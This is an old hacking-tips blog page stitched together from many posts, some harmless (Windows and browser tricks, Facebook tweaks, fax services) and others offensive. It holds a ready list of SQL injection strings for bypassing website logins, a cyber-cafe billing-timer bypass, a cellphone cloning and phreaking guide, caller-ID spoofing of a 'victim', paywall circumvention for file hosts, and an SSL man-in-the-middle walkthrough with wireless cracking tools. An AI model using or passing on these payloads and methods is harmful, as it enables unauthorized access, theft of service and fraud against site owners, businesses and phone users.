BLOGGER TEMPLATES AND Blogger Templates »

Wednesday, January 27, 2010

HACK


Unlock Windows 7 GodMode

Windows 7 GodMode basically lets users access all of the operating system's control panels from within a single folder like one huge control panel for all the OS settings.


This is very simple to unlock, all you have to do is create a folder in a directory of your choice and name it with the following string:

Code:
GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}

Jailbreaking the iPhone/iPod 2G and 3G in 60 seconds


Step 1: Download the program Black Ra1n here: http://rapidshare.com/files/327034907/Jail.Break.for.WIN_MAC.rar this is the only program you need.


Step 2: Once downloaded open it, as you will see it only has one button "make it ra1n"; a very simple process.

Step 3: Now make sure your iPhone or iPod is plugged into your computer through its usb.

Step 4: Once you have it plugged in go to black ra1n and click "make it ra1n" once you click it your iPod/iPhone may show a usb cord and iTunes picture. This means all you have to do is bring up the iTunes window on your computer and then it will display a dude with iPhones around him and a unlocking picture.

Step 5: Then in about a minute your iPhone/iPod will reboot and go to the lock screen, slide to unlock and now you should have a app called "blackra1n" open this app and download "Rock" its like the app store for jailbroken iPods except every thing is free.

Now your done! After the "Rock" app has been downloaded feel free to explore it and have some jailbroken fun!
--
Jasim Manniyil

Windows Update with No Registration

Hacks for Windows Update with No Registration

To use Windows Update, you have register XP. If you want support from Microsoft without having to give them you private data (name, email, phone, ...), you can use the following registry hack to fool XP into thinking that XP has been registered. This is essentially the same hack used in Win98 to block registration. Don't be confused - this is not blocking Product Activation. This will only work if you have not installed XP. If you have installed XP and there is internet connectivity, you already are registered.

* Your PC must not be connected to the network.
* During XP setup answer no when setup asks you to use Windows Dynamic Update.
Dynamic update connects to Microsoft to register XP.
* Once the installation is completed, reboot to Safe mode.
* Click Start
* Click Run
* Rename %systemroot%\System32\regwizc.dll and %systemroot%\System32\Dllcach\regwizc.dll to regwizc.dll.bka or whatever.
By renaming the regwizc DLL, it blocks other windows components from registering XP to Microsoft.
Jasim Manniyil
* Apply registry hack:

Hive: HKEY_LOCAL_MACHINE
Key: SOFTWARE\Microsoft\WindowsNT\CurrentVersion
Name: RegDone
Type: REG_SZ
Value: 1 its registered
* Change the IE home page to something besides Microsoft's web site.
* Reboot to Normal mode and reconnect your nic card before the XP Windows GUI loads.

6 Facebook Hack Codes & Tips To Show Off Your Geeky Skills

#1 – The Konami Code Lens Flare Hack

This is a rather silly hack, but if you’re visiting friends who may not be very computer savvy – this is a very easy way to impress them with your hacking skills. Borrow their computer (or bring your laptop), log into your Facebook account, and then on the computer keyboard just type the following key sequence of arrows and letters exactly: UP-UP-DOWN-DOWN-LEFT-RIGHT-LEFT-RIGHT-B-A-
Then, click around on your Facebook page, or scroll up and down the page (this seems to work best), and you’ll discover a pretty cool display of lens flare effects.
facebook hack codes
Oddly, the effect isn’t horribly annoying because it disappears pretty quickly when you really need it to. It isn’t the most impressive hack though, because it’s probably the most common one mentioned across the net – but it’s still kind of cool and fun to play around with.

#2 – Aye, Make Yer Profile a Pirate’s Page You Landlubber!

The second profile hack is also one of the easiest to implement. Facebook offers users the ability to transform their Facebook pages into any language that they like. If you scroll down to the lower left corner of your profile page, you’ll see your current language setting. Click on this, and you’ll have a list of all languages available to you. Notice the English Pirate option?
facebook hack codes
Ahoy matey – yer now a Cap’n! Now as you go through your profile page you’ll notice some pretty hilarious pirate variations.
facebook hack and codes
Now, the wall is the Plank, your profile is the Cap’n’s Log, and you can now either click a post as pleasin’ to me eye (like) or blabber t’yer mates (comment). It certainly removes the “boring” factor from your old standard Facebook pages.

#3 – Upside Down Status Updates

If you’ve been on Facebook long enough, you’ve probably noticed a few people posting upside down status updates. They sure do think they’re clever don’t they?! Yes, you too can be the envy of all of your friends and family by posting your updates so that people have to look silly by tilting their heads upside down so they can read it.
Most of the people you’ve seen doing this have likely installed a Facebook app just to do so. However, I dislike installing apps because you always have to provide permissions to those applications to access your profile. A better approach is to use the free online application at FlipText to generate your upside down status update.
facebook status fun
Simply copy the upside down text from the lower text box, paste it into your Facebook status box and post!

#4 – Download Complete Photo Collections From Your Friends’ Profiles

If you have a lot of friends on Facebook, you may not have the time to keep up with all of the new family photos they’ve posted – but you are very interested in them and would love to have them stored in your own private photo collection to review later. Well, thanks to a very cool FireFox plug-in called FacePAD, you can do just that. The add-on is awesome, and I would recommend that anyone with the resources to do so should send in a contribution to Arthur Sabintsev for his efforts.
After you install the FacePad plug-in, make sure you select Tools->Add-Ons, and configure the options for FacePad so it has your correct Facebook language. Then, all you have to do is go to your friend’s photo albums, right-click on the title and select “Download Album With FacePAD.” That’s right, you’re not downloading a single picture – but an entire album.
facebook status fun
Once you do, FacePad downloads every single image within that album into the download folder you’ve configured in FireFox. Don’t forget to organize all of those photos using JetPhoto, as recommended earlier by Jeffry.

#5 – Schedule Facebook Status Updates With Sendible

Do you like to keep your Facebook profile active, but you’re coming down with a cold and may be offline for a few days? Maybe you’re taking a trip and won’t be anywhere near a computer for a week. Or maybe you’ll be playing hooky from work and traveling, but you want your colleagues and boss to think you’re stuck at home sick. Accomplish any of these wishes by using Sendible to schedule your Facebook status updates. This is an application Daniel covered earlier, so check out his article for more details.
But for Facebook specifically, once you sign up with Sendible, just click on Facebook and provide your Facebook login details. Sendible connects directly with your Facebook account. The, under “New Messages” click on “Status Updates“.
facebook status fun
On the next page you can schedule out as many updates as you’d like! This service is awesome – and you can distribute scheduled updates to a number of social networks including MySpace, Blogger, Twitter and more.

#6 – Hide Your Online Status From Certain People

Look, don’t feel bad about it. When I first joined Facebook I left my online status wide open. After a couple of weeks of getting inundated with nonstop chat requests, I simply turned off my online status completely. Problem solved. Except, there really were certain people I wouldn’t mind hearing from – is it really fair for a few chatterbox buddies to ruin your chances for communicating with everyone? Well, there is a way for you to selectively block your online status from certain people.
facebook profile customise
All you have to do is open up your chat icon in the lower right corner of your Facebook display, click on Friend Lists, and create a new list called “BlockList.” Make sure after you create it that it’s configured under “Display these lists in Chat.”
facebook profile customise
Now, all you have to do is either click “edit” and add the friends you want to block, or if they’re already online, just click their name and drag them under this new list. Once you’ve got everyone there who you want to block from see your online status, hover your mouse over the green dot to the right and click on “Go Offline.” Now, you appear offline to only those certain friends.
Facebook, unlike MySpace, is not really easy to tweak – which is actually a good thing. Gone are the days of those horrid eye-bleeding pages with pink flashing backgrounds and instant music that you can’t turn off. However, the tweaks and plug-ins in the list above offer at least a few ways to customize your Facebook account and usage to suit your life and your personality.
How do you use Facebook? Are there any hacks or add-ons not offered here that you especially like to use? Share them in the comments section below!

source:makeuseof

2 Free Online Fax Service for Faxing Anywhere via Email and Web

send-free-fax-online
Nowadays the usage of Fax machines at home and offices have significantly decreased. But at times you are forced to fax your personal documents, like for companies like paypal, CJ, etoro etc for verification procedures. And even if you rarely send documents over fax, there is no sense in buying a new fax machine for that matter. Today there are few online fax services which sends your documents over Fax for free.Let’s look into some of those online services which allows us to send fax via internet.


Email to Fax Online with No Restrictions Anywhere in the World

1)FreeFax :
With Freefax,you can send a fax to virtually any part of the world for free. Each fax that you send from freeFAX is routed through the tpc service and directed to the closest fax server to the recipient. The fax is usually sent within a few minutes but could take longer depending on fax traffic at the local fax server.





2)TPC Fax Service
TPC FAX claims to send fax from your web browser as well from your email client. You can check it’s coverage here.It can also deliver image attachments and rich text formatted messages on the recipient's fax machine. If the email to fax service delivery fails for some reason, you get a failure notification via email.
send a fax online tpc logo

CEH : Hacking Online Banking and Credit Card Transactions

Hacking Online Banking and Credit Card Transactions – And How to Prevent It:

Here is process for hacking online banking and credit cards transactions and also a process to prevent from them .

The Scenario

You go to a coffee shop for a cup of coffee and to utilize the shop’s Wi-Fi HotSpot to surf the web. You connect to the hotspot network and decide to perform some online banking or to purchase something online. By the way, this could happen to you at home, as well. As an end-user, you feel quite secure, as you see the lock in the bottom corner of your Internet browser, symbolizing that the online banking or online credit card transaction is safe from prying eyes. Your data, including username, password, credit card info, etc. will be encrypted with 128-bit encryption. So it's secure, right?
It is not uncommon to perform banking and to purchase products online with your credit card. It is also a common thought that doing so is secure, as this is done via SSL. For the most part, this is true and the sessions are secure. Discover Card, for example, posts the following statement on their website:

Figure 1
The problem is that it is not “virtually impossible” for someone else to see your data, such as login information or credit card numbers. It can actually be relatively easy, as you’ll see, if you as an end-user are not knowledgeable about how you can be exploited and know the signs that this is occurring.

Figure 2
(Indicates a Secure SSL Session)
Continuing with the scenario, what you didn’t realize is that a hacker has intercepted your Online Banking login credentials and credit card information and can now log into your Online Banking Website or purchase items with your credit card. How is this possible, since SSL was used and is hard to break? The answer is that you made a fatal mistake that subjected you to an SSL Man-in-the-Middle (MITM) attack.

The Attack

The fatal flaw that enabled the sensitive information to be stolen is possible when an end-user is not properly educated on an easy to do and well-known SSL exploit – SSL MITM.
Here’s how it’s done:
The hacker goes to coffee shop and connects to the same Wi-Fi network you are connected to. He runs a series of utilities to redirect other user’s data through his machine. He runs a number of other utilities to sniff the data, act as an SSL Certificate Server and to be the Man-the-Middle. The following diagram shows a very simplified graphic of how your SSL Banking session should work under normal conditions, then how it would work during an attack:

Figure 3


Figure 4

An important concept to grasp here is that a certificate is used to establish the secure SSL connection. This is a good thing, if you have a good certificate and are connecting directly to the website to which you intended to use. Then all your data is encrypted from your browser to the SSL website where the bank’s website will use the information from the certificate it gave you to decrypt your data/credentials. If that is truly the case, then it is pretty darn hard for a hacker to decrypt the data/credentials being transmitted, even if he is able to sniff your data.
This is a bad thing if you have a “Fake” certificate being sent from the hacker, and you are actually connecting to his machine, not directly to the bank’s website. In this case, your credentials are being transmitted between your browser and the hacker’s machine. The hacker is able to grab that traffic, and, because he gave you the certificate to encrypt the data/credentials, he can use that same certificate to decrypt your data/credentials.
Here are the exact steps a hacker could use to perform this attack:
The first thing he would do is turn on Fragrouter, so that his machine can perform IP forwarding

Figure 5

After that, he’ll want to direct your Wi-Fi network traffic to his machine instead of your data traffic going directly to the Internet. This enables him to be the “Man-in-the-Middle” between your machine and the Internet. Using Arpspoof, a real easy way to do this, he determines your IP address is 192.168.1.15 and the Default Gateway of the Wi-Fi network is 192.168.1.1:

Figure 6

The next step is to enable DNS Spoofing via DNSSpoof:

Figure 7

Since he will be replacing the Bank's or Online Store’s valid certificate with his own fake one, he will need to turn on the utility to enable his system to be the Man-in-the-Middle for web sessions and to handle certificates. This is done via webmitm:

Figure 8

At this point, he is setup and ready to go, he now needs to begin actively sniffing your data passing through his machine including your login information and credit card info. He opts to do this with Ethereal, then saves his capture:

Figure 9

He now has the data, but it is still encrypted with 128-bit SSL. No problem, since he has the key. What he simply needs to do now is decrypt the data using the certificate that he gave you. He does this with SSL Dump:

Figure 10

The data is now decrypted and he runs a Cat command to view the now decrypted SSL information. Note that the username is “Bankusername” and the password is “BankPassword”. Conveniently, this dump also shows that the Banking site as National City. FYI, the better, more secure banking and online store websites will have you first connect to another, preceeding page via SSL, prior to connecting to the page where you enter the sensitive information such as bank login credentials or credit card numbers. The reason for this is to stop the MITM-type attack. How this helps is that if you were to access this preceeding page first with a "fake" certificate and then proceeded to the next page where you were to enter the sensitve information, that page where you would enter the sensitive information would not display. That is because the page gathering the sensitive information would be expecting a valid certificate, which it would not receive because of the Man-in-the-Middle. While some online banks and stores do implement this extra step/page for security reasons, the real flaw in this attack is the uneducated end-user, as you'll soon see:

Figure 11

With this information, he can now log into your Online Banking Account with the same access and privileges as you. He could transfer money, view account data, etc.
Below is an example of a sniffed SSL credit card purchase/transaction. You can see that Elvis Presley was attempting to make a purchase with his credit card 5440123412341234 with an expiration date of 5/06 and the billing address of Graceland in Memphis, TN (He is alive!). If this was your information, the hacker could easily make online purchases with your card.

Figure 12

Also Real Bad News for SSL VPN Admins

This type of attack could be particularly bad for corporations. The reason for this is that Corporate SSL VPN solutions are also vulnerable to this type of attack. Corporate SSL VPN solutions will often authenticate against Active Directory, the NT Domain, LDAP or some other centralized credentials data store. Sniffing the SSL VPN login then gives an attacker valid credentials to the corporate network and other systems.

What an End-User Needs To Know

There’s a big step and end-user can take to prevent this from taking place. When the MITM Hacker uses the “bad” certificate instead of the “good”, valid certificate, the end-user is actually alerted to this. The problem is that most end-users don’t understand what this means and will unknowingly agree to use the fake certificate. Below is an example of the Security Alert an end-user would receive. Most uneducated end-users would simply click “Yes”… and this is the fatal flaw:

Figure 13

By clicking “Yes”, they have set themselves up to be hacked. By clicking the “View Certificate” button, the end-user would easily see that there is a problem. Below are examples of the various certificate views/tabs that show a good certificate compared to the bad certificate:

Figure 14

(Good Certificate) (Bad Certificate)

Figure 15

(Good Certificate) (Bad Certificate)

Figure 16

(Good Certificate) (Bad Certificate)

How an End-User Can Prevent This

  • Again, the simple act of viewing the certificate and clicking “No” would have prevented this from happening.
  • Education is the key for an end-user. If you see this message, take the time to view the certificate. As you can see from the examples above, you can tell when something doesn’t look right. If you can’t tell, err on the side of caution and call your Online Bank or the Online store.
  • Take the time to read and understand all security messages you receive. Don’t just randomly click yes out of convenience.

How a Corporation Can Prevent This

  • Educate the end-user on the Security Alert and how to react to it.
  • Utilize One Time Passwords, such as RSA Tokens, to prevent the reuse of sniffed credentials.
  • When using SSL VPN, utilize mature products with advanced features, such as Juniper’s Secure Application Manager or Network Connect functionality.

Conclusion

This type of attack is relatively easy to do in a public Wi-Fi hotspot environment. It could also easily happen on a home Wi-Fi network, if that Wi-Fi network isn’t properly configured and allows a hacker to connect to that home network . An educated end-user and sound security practices by corporations can protect your valuable data.
The credit goes to the Ethical Hackers.

CEH : Essential Wirless Hacking Tools

Essential Wireless Hacking Tools,& the most important wireless hacing tools ,here are the most essential tools for wireless hacking ,guys interested in gaining a deeper knowledge of wireless security and exploiting vulnerabilities will need a good set of base tools with which to work. Fortunately, there are an abundance of free tools available on the Internet. This list is not meant to be comprehensive in nature but rather to provide some general guidance on recommended tools to build your toolkit.
Finding Wireless Networks:
Locating a wireless network is the first step in trying to exploit it. There are two tools that are commonly used in this regard:
Network Stumbler a.k.a NetStumbler – This Windows based tool easily finds wireless signals being broadcast within range – A must have. It also has ability to determine Signal/Noise info that can be used for site surveys. I actually know of one highly known public wireless hotspot provider that uses this utility for their site surveys
.


(NetStumbler Screenshot)
KismetOne of the key functional elements missing from NetStumbler is the ability to display Wireless Networks that are not broadcasting their SSID. As a potential wireless security expert, you should realize that Access Points are routinely broadcasting this info; it just isn’t being read/deciphered. Kismet will detect and display SSIDs that are not being broadcast which is very critical in finding wireless networks.


(Kismet Screenshot)

Attaching to the Found Wireless Network:Once you’ve found a wireless network, the next step is to try to connect to it. If the network isn’t using any type of authentication or encryption security, you can simply connect to the SSID. If the SSID isn’t being broadcast, you can create a profile with the name of the SSID that is not being broadcast. Of course you found the non-broadcast SSID with Kismet, right? If the wireless network is using authentication and/or encryption, you may need one of the following tools.

AirsnortThis is a very easy to use tool that can be used to sniff and crack WEP keys. While many people bash the use of WEP, it is certainly better than using nothing at all. Something you’ll find in using this tool is that it takes a lot of sniffed packets to crack the WEP key. There are additional tools and strategies that can be used to force the generation of traffic on the wireless network to shorten the amount of time needed to crack the key, but this feature is not included in Airsnort.


(Screenshot of Airsnort in Action)
CowPattyThis tool is used as a brute force tool for cracking WPA-PSK, considered the “New WEP” for home Wireless Security. This program simply tries a bunch of different options from a dictionary file to see if one ends up matching what is defined as the Pre-Shared Key.


(Cowpatty Options Screenshot)
ASLeapIf a network is using LEAP, this tool can be used to gather the authentication data that is being passed across the network, and these sniffed credentials can be cracked. LEAP doesn’t protect the authentication like other “real” EAP types, which is the main reason why LEAP can be broken.


(Asleap Options Screenshot)

Sniffing Wireless Data:

Whether you are directly connected to a wireless network or not, if there is wireless network in range, there is data flying through the air at any given moment. You will need a tool to be able to see this data.
Wireshark (formerly Ethereal) – While there has been much debate on the proper way to pronounce this utility, there is no question that it is an extremely valuable tool. Ethereal can scan wireless and Ethernet data and comes with some robust filtering capabilities. It can also be used to sniff-out 802.11 management beacons and probes and subsequently could be used as a tool to sniff-out non-broadcast SSIDs.


(Screenshot of Ethereal in Action)


(Yahoo IM Session being sniffed in Ethereal)
The aforementioned utilities, or similar ones, will be necessities in your own wireless security toolkit. The easiest way to become familiar with these tools is to simply use them in a controlled lab environment. And cost is no excuse as all of these tools are available freely on the Internet.

Protecting Against These Tools:

Just as it’s important to know how to utilize the aforementioned tools, it is important to know best practices on how to secure your Wireless Network Against these tools.
NetStumblerDo not broadcast your SSID. Ensure your WLAN is protected by using advanced Authentication and Encryption.
KismetThere’s really nothing you can do to stop Kismet from finding your WLAN, so ensure your WLAN is protected by using advanced Authentication and Encryption
AirsnortUse a 128-bit, not a 40-bit WEP encryption key. This would take longer to crack. If your equipment supports it, use WPA or WPA2 instead of WEP (may require firmware or software update).
Cowpatty – Use a long and complex WPA Pre-Shared Key. This type of key would have less of a chance of residing in a dictionary file that would be used to try and guess your key and/or would take longer. If in a corporate scenario, don’t use WPA with Pre-Shared Key, use a good EAP type to protect the authentication and limit the amount of incorrect guesses that would take place before the account is locked-out. If using certificate-like functionality, it could also validate the remote system trying to gain access to the WLAN and not allow a rogue system access.
ASLeapUse long and complex credentials, or better yet, switch to EAP-FAST or a different EAP type.
Ethereal – Use encryption, so that anything sniffed would be difficult or nearly impossible to break. WPA2, which uses AES, is essentially unrealistic to break by a normal hacker. Even WEP will encrypt the data. When in a Public Wireless Hotspot (which generally do not offer encryption), use application layer encryption, like Simplite to encrypt your IM sessions, or use SSL. For corporate users, use IPSec VPN with split-tunneling disabled. This will force all traffic leaving the machine through an encrypted tunnel that would be encrypted with DES, 3DES or AES.
The credit goes to the Ethical Hackers.

Mobile hack : How to call your friends with their own number

mobile hack with useful prank to confuse your friends. With this mobile hack, you can call your friends with their own mobile number, trick by jasim manniyil... meaning by, they will see their own number calling them. Just follow the guidelines I have mentioned in this mobile hack article.

Mobile hack to call your friends:


1. Go to http://www.mobivox.com and register there for free account.

2. During registration, remember to insert Victim cell phone number in "Phone number" field as shown below.

How to hack mobile

3. Complete registration and confirm your email account id and then login to your account. Click on "Direct WebCall".

Mobile hack

4. You will arrive at page shown below. In "Enter a number" box, select your country and also any mobile number(you can enter yours). Now, simply hit on "Call Now" button to call your friend with his own cell phone number.

cell phone hack

5. That's it. Your friend will be shocked to see his own number calling him. I have spent last two days simply playing this cool mobile hack prank.

Credit goes to Prakash.

Thus, use this cool mobile hack to surprise and shock your friends. This mobile hack is free. So, you don't need to lose a buck. Simply register and you'll be able to perform this mobile hack. This mobile hack is available for almost all countries and all cell phones network providers. If you have any problem in implementing this mobile hack, please mention it in comments.

Credit goes to JBM

6 Tips to Increase BSNL Broadband

BSNL Internet is most famous Internet Broadband connection service in India. Its only due to its ready availability and somewhat cost-effectiveness. But, even though, many BSNL Broadband and BSNL Cellone Dataone users are frustated with BSNL Internet and BSNL broadband connection. Even I am a BSNL Broadband user and so I thought of informing you 5 hacks to increase BSNL broadband connection speed.

BSNL Broadband

Increase BSNL Broadband connection speed:



To increase BSNL broadband speed, just follow these 6 BSNL hacks:

1. Change BSNL DNS servers:

The main reason for slow BSNL Broadband connection speed is slow BSNL DNS servers. So, we can increase BSNL Broadband connection speed by changing default BSNL DNS servers to fast BSNL DNS servers, which can help us to increase BSNL broadband connection speed. Just check out my article Increase BSNL Broadband speed for more information on how to change BSNL DNS servers.

2. Use Adblock Plus:

The best way to increase BSNL Broadband connection speed is to block flash and other unwanted ad material on webpage, so that page loads faster, thus make BSNL Broadband apparently fast. AdBlockPlus is a firefox addon used to block flash content of page, thus helping you to increase BSNL Broadband connection speed.

3. Using TCPOptimizer:

This is another software used to optimize your TCP/IP connection settings. You can use this to Optimize your BSNL network settings. Install TCPOptimizer.

4. Using FasterFox:

With Fasterfox's unique prefetching mechanism, you can increase BSNL Broadband connection speed which recycles idle bandwidth by silently loading and caching all of the links on the page you are browsing.Install FasterFox.

5. Reducing cache space:

Reduced Cache space can be used to increase BSNL Broadband speed. You can do this as:

For Internet Explorer : Tools -> Internet Options -> Browsing History ->Settings ->Disk space to use and reduce disk space value to "50".

For Firefox: Tools ->Options ->Advanced ->Network and look for cache space. Change value to 50.

These are some BSNL hacks to increase BSNL internet broadband connection speed. Just give them a try and check out whether it works for you to increase BSNL internet speed. If you have any other BSNL hack to increase BSNL broadband speed, please mention it in comments.

Enjoy n increase BSNL Broadband speed...

Hack Unlimited Net-Café Surfing

Have you ever visit a cyber cafe and found yourself too restricted by the hourly rates for using the internet?

Most often these prices are inflated especially in places where cyber cafes’ are the main source for high speed internet surfing.

Here is a tutorial that will teach you how to Disable The Timer On The Computers in the Internet Cafe’s.

Step 1

Create A New Text Document, type CMD in it & then save it as a batch file (some-name.bat).

When you run this file, the command prompt window will open on the computer.

Step 2


Next type cd\windows in the command prompt window to change the directory to Windows.

Now type in regedit to get to the registry editor gui.

Step 3

Once in regedit, get to the following area:

HKEY_CURRENT_USER>Appevents>software>classes> microsoft>windows>current version>internet settings>policies>system

once there, on the right side pane where it says Disable Taskmanager,

right click on it, and select Modify. Change the value to “0″

Step 4

Now open Windows Task Manager By Holding Down: “CTRL+ALT+DEL”. In the processes list,

look for any program names that looked like the program that controls the cafe timer.

Many cyber cafes use cyberlux as the timing device but your product may vary depending on where you are located.

Enjoy unlimited surfing! Drop us a line if you found this useful or succesded in doing this in your cafe

Best Firefox Tips Hacks Secrets & Tricks Guide - eBook


This is a must read guide to anyone who wants to learn how to browse faster and more conveniently with Firefox. Firefox Secrets will teach you how to get the most from Mozilla, including how to find and use all the hidden features, extensions available to you.

The Best Guide to Firefox Tips Tricks Hacks & Secrets


Content :
* Ways to ease the transition from Internet Explorer
* A way to setup multiple homepages when you launch your browser
* Read RSS feeds from within Firefox using a free extension
* Where to download a new and less obtrusive Download Manager
* The best must-have extensions to download as well as the fun ones
* Two different ways to speed up Firefox downloads with prefetcher and pipelining
* Firefoxs secret features for Web Developers
* And much, much more!

Firefox Secrets is the ultimate guide to the Web Browser that major magazines, newspapers are recommending as the ultimate replacement to Internet Explorer.

Get The Book : Download Now

Download for Free from MegaVideo



Hello Friends, As all of you know about MegaVideo, MegaVideo is a video sharing website run by the creators of Megaupload based in Hong Kong. MegaVideo is one of the 100 most visited website in the world. MegaVideo has various types of online video in its database but MegaVideo is not provide any facility to download videos for free users (means only premium members or membership user can download videos from Megavideo) but here i am giving you one trick by which you can download videos from MegaVideo very easily. To download videos from MegaVideo you mast have Internet Explorer. Now follow the steps shown below to download video from MegaVideo:
1. Open MegaVideo Link in Internet Explorer.
2. After open MegaVideo Link Internet Explorer click on Play button or arrow to play video.
3. Now you can see video is start buffering, now click on stop button. When you click on stop video will continue its buffering so please wait untill all buffering is complete.
4. Once all buffering is completed Go to Tools->Internet Options in Internet Explorer.
5. After that Click on Settings in Temporary Intenet Files section.
6. After click on settings you will see one button “View Files” in dialogue box. Click on View Files.
7. When you click on View Files one window will open which have so mamy files of all extensions, But you will see also one file which have big in size and also don’t have any extension and have big file name, Just copy this file and paste it wherever you want. This is your downloaded video from MegaVideo.

Opera Tricks

1. Open links in a new tab:

The usual procedure to open links in a new tab is right clicking on a link and then selecting "Open in new tab" or "Open in background tab". Now here is the shortcut. Press SHIFT while clicking on a link to open in a new tab and SHIFT+CTRL to open in a background tab. This works for the context menu options as well. For example, highlight a word, right click on it and then click Search while pressing SHIFT will open the search page in an new tab. Similarly, pressing SHIFT+CTRL will open the search page in a background tab. The same thing happens with "Go to URL" option.

2. Alternate shortcut for PageUP/PageDown

If you are right-handed then you are holding the mouse with your right hand while your left hand is near or on the keyboard. So keyboard shortcuts which are nearer to the left hand are easier to execute than shortcuts which are towards the right. This is the reason why some games have WASD key combination for movement and the mouse for attack. In Opera, to scroll up a page instead of using PageUP press SHIFT+SPACEBAR. To scroll down press SPACEBAR.

3. CTRL+Mouse Wheel to Zoom

The shortcuts for zooming pages is the Numpad+ and Numpad-. For the same reason stated above these keys are difficult to reach. Instead, press the CTRL key and use the mouse scroll wheel to quickly zoom pages in and out.

4. CTRL+Click to save an image

Want to save an image? Press CTRL while clicking on an image to open the Save as box. Give a name and hit Enter.

5. CTRL+Spacebar to open homepage

If you’ve set a homepage in Opera, you can open it quickly by pressing Press CTRL+Spacebar.

www.hackerworld.tk

Free Kaspersky Antivirus 2010 License For 6 Months

Kaspersky Anti-Virus 2010 – the backbone of your PC’s security system – offers protection from a range of IT threats and provides the basic tools needed to protect your PC. Now you can Use this latest Version for 6 Months. Kaspersky Anti-Virus 2010 (version 9) is the newest version of Kaspersky Anti-Virus series which provides easy-to-use solution provides complete antivirus protection that allows users to surf the web safely and keeps your PC free of viruses, Internet and email worms, and Trojans. So here is the Instruction to get the 6 Month Free License for Kaspersky Antivirus 2010 :-
1. Go to Kaspersky 2010 http://kaba.msn.com.cn Page and Click the Orange Button.



2. Login to your Windows Live ID or MSN ID. If you have an Hotmail account, just sign in with the same user name and password credentials.


A valid genuine activation code for 6 months Kaspersky Anti-Virus 2010 subscription period will be instantly displayed on screen. Thats it So Simple
Now Download Kaspersky Antivirus 2010 here and Enter the Licence Key at the Time of Installation.
Note that the activation code is valid only for Simplified Chinese version of Kaspersky Anti-Virus 2010, which can be downloaded from here: http://www.kaba365.com/4640000.asp.

Download from Megaupload without limit






1. Fake your IP to get US IP. Use can Download and run UltraSurf
http://www.ultrareach.com/downloads/ultrasurf/u95.zip
2. Run your Firefox > Tools > Options > Advanced > Network > Settings > Manual proxy configuration > Http proxy: localhost ; Port: 9666



3. Visit NEWIP.TK to check your new IP



4. Step4: Paste Megaupload link to address bar > Type code to download: Need not waiting any second, download multi files at a time ...

Cellphone Freak

The cellular/mobile phone system is one that is perfectly set up to be exploited by phreaks with the proper knowledge and equipment. Thanks to deregulation, the regional BOC's (Bell Operating Companies) are scattered and do not communicate much with each other. Phreaks can take advantage of this by pretending to be mobile phone customers whose "home base" is a city served by a different BOC, known as a "roamer". Since it is impractical for each BOC to keep track of the customers of all the other BOC's, they will usually allow the customer to make the calls he wishes, often with a surcharge of some sort.

The bill is then forwarded to the roamer's home BOC for collection. However, it is fairly simple (with the correct tools) to create a bogus ID number for your mobile phone, and pretend to be a roamer from some other city and state, that's "just visiting". When your BOC tries to collect for the calls from your alleged "home BOC", they will discover you are not a real customer; but by then, you can create an entirely new electronic identity, and use that instead.

How does the cellular system know who is calling, and where they are? When a mobile phone enters a cell's area of transmission, it transmits its phone number and its 8 digit ID number to that cell, who will keep track of it until it gets far enough away that the sound quality is sufficiently diminished, and then the phone is "handed off" to the cell that the customer has walked or driven into. This process continues as long as the phone has power and is turned on. If the phone is turned off (or the car is), someone attempting to call the mobile phone will receive a recording along the lines of "The mobile phone customer you have dialed has left the vehicle or driven out of the service area." When a call is made to a mobile phone, the switching equipment will check to see if the mobile phone being called is "logged in", so to speak, or present in one of the cells. If it is, the call will then act (to the speaking parties) just like a normal call - the caller may hear a busy tone, the phone may just ring, or the call may be answered.

How does the switching equipment know whether or not a particular phone is authorized to use the network? Many times, it doesn't. When a dealer installs a mobile phone, he gives the phone's ID number (an 8 digit hexadecimal number) to the local BOC, as well as the phone number the BOC assigned to the customer. Thereafter, whenever a phone is present in one of the cells, the two numbers are checked - they should be registered to the same person. If they don't match, the telco knows that an attempted fraud is taking place (or at best, some transmission error) and will not allow calls to be placed or received at that phone. However, it is impractical (especially given the present state of deregulation) for the telco to have records of every cellular customer of every BOC. Therefore, if you're going to create a fake ID/phone number combination, it will need to be "based" in an area that has a cellular system (obviously), has a different BOC than your local area does, and has some sort of a "roamer" agreement with your local BOC.

How can one "phreak" a cellular phone? There are three general areas when phreaking cellular phones; using one you found in an unlocked car (or an unattended walk-about model), modifying your own chip set to look like a different phone, or recording the phone number/ID number combinations sent by other local cellular phones, and using those as your own. Most cellular phones include a crude "password" system to keep unauthorized users from using the phone - however, dealers often set the password (usually a 3 to 5 digit code) to the last four digits of the customer's mobile phone number. If you can find that somewhere on the phone, you're in luck. If not, it shouldn't be TOO hard to hack, since most people aren't smart enough to use something besides "1111", "1234", or whatever.

If you want to modify the chip set in a cellular phone you bought (or stole), there are two chips (of course, this depends on the model and manufacturer, yours may be different) that will need to be changed - one installed at the manufacturer (often epoxied in) with the phone's ID number, and one installed by the dealer with the phone number, and possible the security code. To do this, you'll obviously need an EPROM burner as well as the same sort of chips used in the phone (or a friendly and unscrupulous dealer!). As to recording the numbers of other mobile phone customers and using them; as far as I know, this is just theory... but it seems quite possible, if you've got the equipment to record and decode it.

The cellular system would probably freak out if two phones (with valid ID/phone number combinations) were both present in the network at once, but it remains to be seen what will happen.

bypass login of web sites by sql injection explained

For those of you who dont already know SQL injection is a technique used to take advantage of non-validated input vulnerabilities to pass SQL commands through a Web application for execution by a backend database. Attackers take advantage of the fact that programmers often chain together SQL commands with user provided parameters, and can therefore embed SQL commands inside these parameters. the result is that the attacker can execute arbitrary SQL queries and commands on the backend database server through the Web application.

A database is a table full of private and public site information such as usernames, products, etc. They are fundamental components of Web applications. Databases enable Web applications to store data, preferences and content elements. Using SQL web applications interact with databases to dynamically build customized data views for each user.

Data types:
mysql.user
mysql.host
mysql.db
Bypassing login scripts:
SQL injection strings and the DB doesnt matter.

') OR ('a' = 'a
') OR ('1'-'1
'or''='
' OR '1=1
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 *
" or 0=0 *
or 0=0 *
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
' or 1=1--
or a=a--
' or 1=1--
1' having '1'='1'--
' or 'x'='x--
foo'+OR+'1'='1

Note: having 1=1--

Example:

Login: hi'or 1=1--
Password: hi'or 1=1--
SQL commands:
ABORT -- abort the current transaction
ALTER DATABASE -- change a database
ALTER GROUP -- add users to a group or remove users from a group
